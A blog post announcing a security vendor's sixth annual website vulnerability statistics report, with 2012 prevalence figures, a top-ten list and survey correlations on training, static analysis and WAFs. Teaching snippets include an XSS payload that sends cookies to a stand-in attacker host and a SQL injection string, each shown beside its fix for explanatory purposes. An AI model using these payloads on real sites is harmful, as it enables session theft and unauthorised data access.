This year, our 6th, we’ve done things differently. We wanted to try something truly ambitious, something that advances our collective understanding of application security, and something that to our knowledge has never been done before!
So, in addition to releasing the detailed website vulnerability metrics the community has come to rely upon, we sought to measure the impact of today’s so-called “best practices”: to find out whether activities such as software security training for developers, pre-production testing, static code analysis, and web application firewalls really do lead to better security metrics and fewer breaches, and to answer the fundamental question of which aspects of an SDLC program actually make a difference, and by how much. Of course, every “expert” has an opinion on the matter, but the best most anyone has had is personal anecdote. That is, until now.
To get there, we asked all Sentinel customers to privately share details about their SDLC and application security programs via survey; we received 76 responses in total. We then aggregated their answers and correlated them with their website vulnerability outcomes and reported breaches. The results of this data combination are nothing less than stunning, enlightening, and often confusing.
To give you a taste of the full report, let’s start with the high-level basics:
The average number of serious* vulnerabilities per website continues to decline, going from 79 in 2011 down to 56 in 2012. This was not wholly unexpected. Despite this, 86% of all websites tested were found to have at least one serious vulnerability during 2012. Of the serious vulnerabilities found, on average 61% were resolved, and resolution took an average of 193 days from the date of notification.
As for the Top Ten most prevalent vulnerability classes in 2012, the list is relatively close to last year’s, though Information Leakage surpassed Cross-Site Scripting yet again (a brief XSS refresher follows the list):
- Information Leakage – 55% of websites
- Cross-Site Scripting – 53% of websites
- Content Spoofing – 33% of websites
- Cross-Site Request Forgery – 26% of websites
- Brute Force – 26% of websites
- Fingerprinting – 23% of websites
- Insufficient Transport Layer Protection – 22% of websites
- Session Fixation – 14% of websites
- URL Redirector Abuse – 13% of websites
- Insufficient Authorization – 11% of websites
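For readers who want a refresher on the list’s #2 entry, here is a minimal sketch of a reflected Cross-Site Scripting flaw and the output-encoding fix. The handler functions are hypothetical illustrations, not anything drawn from the report:

```python
import html

# Vulnerable: reflects user input into the page unencoded, so a value like
# "<script>document.location='//evil.example/?c='+document.cookie</script>"
# executes in the victim's browser. (Hypothetical handler for illustration.)
def search_results_vulnerable(query: str) -> str:
    return "<h1>Results for " + query + "</h1>"

# Safer: HTML-encode untrusted input before it reaches the page, so the
# payload renders as inert text instead of executing.
def search_results_safer(query: str) -> str:
    return "<h1>Results for " + html.escape(query) + "</h1>"

if __name__ == "__main__":
    payload = "<script>alert(1)</script>"
    print(search_results_vulnerable(payload))  # script tag survives intact
    print(search_results_safer(payload))       # &lt;script&gt;alert(1)&lt;/script&gt;
```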
Conspicuously absent is SQL Injection, which fell from #8 in 2011 to #14 in 2012 and is now identified in only 7% of websites. Obviously, vulnerability prevalence alone does not equate to exploitation.
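As a refresher on why SQL Injection remains dangerous even at low prevalence, the classic flaw and its parameterized-query fix look roughly like this. This is a self-contained sketch using Python’s built-in sqlite3, with an invented table:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, is_admin INTEGER)")
conn.execute("INSERT INTO users VALUES ('alice', 0), ('bob', 1)")

user_input = "x' OR '1'='1"  # attacker-controlled value

# Vulnerable: string concatenation lets the input rewrite the query,
# returning every row instead of none.
rows = conn.execute(
    "SELECT name FROM users WHERE name = '" + user_input + "'"
).fetchall()
print("concatenated query:", rows)   # [('alice',), ('bob',)]

# Safer: a parameterized query treats the input strictly as data.
rows = conn.execute(
    "SELECT name FROM users WHERE name = ?", (user_input,)
).fetchall()
print("parameterized query:", rows)  # []
```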
When we took a closer look at some of the correlations between the vulnerability and survey data, we found some counter-intuitive statistics, implying that software security controls, or “best practices,” do not necessarily lead to better security, at least not at all times in all cases (a toy sketch after the list shows the mechanics of these comparisons):
- 57% of organizations surveyed provide some amount of instructor-led or computer-based software security training for their programmers. These organizations experienced 40% fewer vulnerabilities, resolved them 59% faster, but exhibited a 12% lower remediation rate.
- 39% of organizations said they perform some amount of Static Code Analysis on their websites’ underlying applications. These organizations experienced 15% more vulnerabilities, resolved them 26% slower, and had a 4% lower remediation rate.
- 55% of organizations said they have a Web Application Firewall (WAF) in some state of deployment. These organizations experienced 11% more vulnerabilities, resolved them 8% slower, and had a 7% lower remediation rate.
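As promised, here is the kind of group comparison behind the percentages above, sketched in Python with invented numbers rather than our actual dataset:

```python
from statistics import mean

# Hypothetical records: one per customer, pairing a survey answer with
# measured vulnerability outcomes (all values invented for illustration).
records = [
    {"training": True,  "serious_vulns": 34, "days_to_fix": 120},
    {"training": True,  "serious_vulns": 41, "days_to_fix": 95},
    {"training": False, "serious_vulns": 62, "days_to_fix": 210},
    {"training": False, "serious_vulns": 58, "days_to_fix": 190},
]

def group_mean(rows, answered_yes, field):
    """Average of `field` over customers who gave the same survey answer."""
    return mean(r[field] for r in rows if r["training"] == answered_yes)

with_training = group_mean(records, True, "serious_vulns")
without_training = group_mean(records, False, "serious_vulns")

# e.g. "organizations with training experienced X% fewer vulnerabilities"
pct_fewer = 100 * (without_training - with_training) / without_training
print(f"{pct_fewer:.0f}% fewer serious vulnerabilities with training")
```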
Two questions we posed in our survey illustrated that compliance is the number one driver for fixing web vulnerabilities… while it is also the number one driver for not fixing them. Proponents of compliance often suggest that mandatory regulatory controls be treated as a “security baseline,” a platform that raises the floor rather than defining the ceiling. While this is a nice concept in casual conversation, it is typically not the reality we see.
The last point I want to bring up for now focuses on accountability in the event of a data breach. Should an organization experience a website or system breach, WhiteHat Security found that 27% of organizations said the Board of Directors would be held accountable. Additionally, 24% said Software Development, 19% said the Security Department, and 18% said Executive Management. Here’s where things get really interesting, though: by analyzing the data in this report, we see evidence of a direct correlation between increased accountability and decreased breaches, and evidence of the efficacy of “best practices” and security controls.
We stopped short of coming to any strong conclusions based upon this data alone. However, we now have something solid to work from in establishing new theories and avenues of research to explore. Please, have a look at the report and let us know what stands out to you. What are your theories for why things are the way they are? If you’d like different slices of the data, we’re all ears.
Tweet your thoughts with #WebsiteVulnStats to @jeremiahg and @whitehatsec.
Personal side note: I would like to thank all of our customers who responded to our survey earlier this year, as well as a select group of respected individuals in the security space (they know who they are) who got a sneak peek of our findings last week and whose feedback was invaluable. Thanks also to my colleagues Gabriel Gumbs, Sevak Tsaturyan, Siri De Licori, Bill Coffman, Matt Johansen, Johannes Hoech, Kylie Heintz, and Michele Cox, whose teamwork helped bring everything together.